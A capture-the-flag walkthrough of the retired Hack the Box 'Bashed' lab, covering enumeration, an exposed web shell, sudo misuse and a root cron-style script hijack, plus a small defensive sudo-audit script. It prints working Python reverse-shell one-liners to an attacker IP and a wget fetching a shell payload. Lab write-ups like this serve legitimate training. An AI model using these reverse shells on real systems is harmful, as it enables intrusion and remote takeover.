Today we are going to solve the CTF challenge “Bashed”. It is a lab developed by Hack the Box, which has an amazing collection of online labs on which you can practice your penetration testing skills. Their labs range from ones designed for beginners to ones for expert penetration testers. Bashed is a retired lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!
As these labs are only available online, they have a static IP. The Bashed lab has the IP 10.10.10.68.
Now, as always, let’s begin with port enumeration.
C:\Users\jacco>nmap -sC -sV 10.10.10.68
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-03 18:45 W. Europe Summer Time
Nmap scan report for 10.10.10.68
Host is up (0.030s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds
Next, we use wfuzz to enumerate directories and find some interesting ones, such as /dev. The first run shows every response, including the 404s; the second run hides those with --hc=404 so that only the directories that actually exist remain.
c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt http://10.10.10.68/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************
Target: http://10.10.10.68/FUZZ
Total requests: 220560
==================================================================
ID       Response   Lines    Word     Chars     Payload
==================================================================
000001:  C=200     161 L    397 W    7745 Ch   "# directory-list-2.3-medium.txt"
000002:  C=200     161 L    397 W    7745 Ch   "#"
000003:  C=200     161 L    397 W    7745 Ch   "# Copyright 2007 James Fisher"
000018:  C=404       9 L     32 W     279 Ch   "2006"
000019:  C=404       9 L     32 W     279 Ch   "news"
000013:  C=200     161 L    397 W    7745 Ch   "#"
000014:  C=200     161 L    397 W    7745 Ch   ""
000015:  C=404       9 L     32 W     280 Ch   "index"
000016:  C=301       9 L     28 W     311 Ch   "images"
000017:  C=404       9 L     32 W     283 Ch   "download"
000020:  C=404       9 L     32 W     280 Ch   "crack"
000021:  C=404       9 L     32 W     281 Ch   "serial"
000022:  C=404       9 L     32 W     280 Ch   "warez"
000023:  C=404       9 L     32 W     279 Ch   "full"
000030:  C=404       9 L     32 W     277 Ch   "11"
Finishing pending requests...
c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.68/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************
Target: http://10.10.10.68/FUZZ
Total requests: 220560
==================================================================
ID       Response   Lines    Word     Chars     Payload
==================================================================
000001:  C=200     161 L    397 W    7745 Ch   "# directory-list-2.3-medium.txt"
000002:  C=200     161 L    397 W    7745 Ch   "#"
000003:  C=200     161 L    397 W    7745 Ch   "# Copyright 2007 James Fisher"
000013:  C=200     161 L    397 W    7745 Ch   "#"
000016:  C=301       9 L     28 W     311 Ch   "images"
000012:  C=200     161 L    397 W    7745 Ch   "# on atleast 2 different hosts"
000014:  C=200     161 L    397 W    7745 Ch   ""
000164:  C=301       9 L     28 W     312 Ch   "uploads"
000338:  C=301       9 L     28 W     308 Ch   "php"
000550:  C=301       9 L     28 W     308 Ch   "css"
000834:  C=301       9 L     28 W     308 Ch   "dev"
000953:  C=301       9 L     28 W     307 Ch   "js"
002771:  C=301       9 L     28 W     310 Ch   "fonts"
044769:  C=
Finishing pending requests...
When you open the /dev directory in the browser, you get a link to phpbash.php. Click on that link.
It redirects to the page shown below, which is a shell that you interact with through the browser.
From there you can execute arbitrary OS commands to test whether it works. We ran ls to list the contents of the current directory.
To upgrade this to a proper reverse shell, we execute the following command in phpbash, with a netcat listener waiting on port 443:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 60876: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@bashed:/var/www/html/dev$ cd /home
cd /home
www-data@bashed:/home$ ls
ls
arrexel  scriptmanager
www-data@bashed:/home$ cd arrexel
cd arrexel
www-data@bashed:/home/arrexel$ cat user.txt
cat user.txt
2c2*****fc1
www-data@bashed:/home/arrexel$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/home/scriptmanager$ sudo -u scriptmanager bash -i
sudo -u scriptmanager bash -i
scriptmanager@bashed:~$ wget http://10.10.14.20/puckshell.py
wget http://10.10.14.20/puckshell.py
--2019-04-03 09:35:59--  http://10.10.14.20/puckshell.py
Connecting to 10.10.14.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 213 [text/plain]
Saving to: 'puckshell.py'

puckshell.py        100%[===================>]     213  --.-KB/s    in 0s

2019-04-03 09:35:59 (30.4 MB/s) - 'puckshell.py' saved [213/213]

scriptmanager@bashed:~$ cp puckshell.py /scripts/puckshell.py
cp puckshell.py /scripts/puckshell.py
scriptmanager@bashed:~$ cd /scripts
cd /scripts
scriptmanager@bashed:/scripts$ ls -la
ls -la
total 20
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr  3 09:43 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager  213 Apr  3 09:43 puckshell.py
-rw-r--r--  1 scriptmanager scriptmanager    0 Apr  2 08:50 test.py
-rw-r--r--  1 scriptmanager scriptmanager   58 Apr  2 08:50 test.py.bak
-rw-r--r--  1 root          root            12 Apr  2 08:50 test.txt
scriptmanager@bashed:/scripts$ cat puckshell.py
cat puckshell.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
scriptmanager@bashed:/scripts$
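The sudo -l output above is what gave us the step from www-data to scriptmanager: a rule that needs no password, allows any command, and runs as a different user. As an added example (not part of the original walkthrough), here is a small Python audit that parses that output format and flags exactly those properties; the sample text is copied from the session above.

```python
import re

# Constructed sample: the `sudo -l` output captured in the session above
SUDO_L_OUTPUT = r"""Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
"""

USER_RE = re.compile(r"^User (\S+) may run the following commands on (\S+):")
# A rule line looks like "(runas_user : runas_group) TAG: TAG: command list"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return (invoking_user, host, rules); each rule has runas, tags and cmds."""
    user = host = None
    rules = []
    in_rules = False
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user, host = m.group(1), m.group(2)
            in_rules = True          # everything after this header is a rule line
            continue
        if not in_rules or not line.strip():
            continue
        r = RULE_RE.match(line)
        if r:
            rules.append({
                "runas": r.group("runas").split(":")[0].strip(),  # user part of "(user : group)"
                "tags": [t.rstrip(":") for t in r.group("tags").split()],
                "cmds": r.group("cmds").strip(),
            })
    return user, host, rules


def assess_rule(user, rule):
    """List the properties that make one sudoers rule a privilege-escalation path."""
    findings = []
    if "NOPASSWD" in rule["tags"]:
        findings.append("no password required")
    if rule["cmds"] == "ALL":
        findings.append("any command allowed")
    if rule["runas"] in ("ALL", "root"):
        findings.append("runs as root")
    elif rule["runas"] != user:
        findings.append("runs as another user: " + rule["runas"])
    return findings
```

Running assess_rule over every rule returned by parse_sudo_l gives a quick list of the sudo grants worth reviewing on a host, which is the check that would have caught this www-data to scriptmanager hop before an attacker did.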
C:\Users\jacco>nc -lvp 53
listening on [any] 53 ...
10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 51794: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
cc4*****8e2
#
Author: Jacco Straathof